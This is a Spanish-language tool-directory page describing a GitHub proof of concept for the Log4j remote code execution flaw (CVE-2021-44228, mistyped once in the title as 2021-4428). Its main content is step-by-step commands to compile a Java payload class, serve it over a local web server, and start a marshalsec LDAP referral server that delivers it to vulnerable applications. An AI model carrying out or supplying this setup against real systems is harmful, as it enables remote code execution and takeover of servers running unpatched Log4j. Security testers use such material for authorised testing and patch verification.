Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-44228-Log4j-PoC-RCE — PoC RCE Log4j CVE-2021-4428 para pruebas | Kitploit
Herramientas/GitHubGitHub/grupo-kapa-7/cve-2021-44228-log4j-poc-rce
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubgrupo-kapa-7/cve-2021-44228-log4j-poc-rce

CVE-2021-44228-Log4j-PoC-RCE

PoC RCE Log4j CVE-2021-4428 para pruebas

Ver Repositorio
11hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Apache Log4j CVE-2021-44228 GK7 PoC

Pasos

  1. Compilar Log4jRCE.java y mover el archivo .class a un servidor web (ej: PHP local)

    1. cd src/main/java
    2. javac Log4jRCE.java
    3. Mover archivo .class a server web o iniciar localmente un php, por ejempl : php -S 127.0.0.1:8888
  2. Iniciar LDAP Server

    1. git clone [email protected]:Grupo-Kapa-7/marshalsec.git
    2. cd marshalsec
    3. mvn clean package -DskipTests
    4. start ldap server java -cp target/marshalsec-0.0.3-SNAPSHOT-GK7Threats-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Log4jRCE"
  • Para proabr la PoC, modificar el archivo src/main/java/log4j.java y cambiar el URL del servidor LDAP a su gusto.

  • Repo Original

    https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce

    Descargar herramienta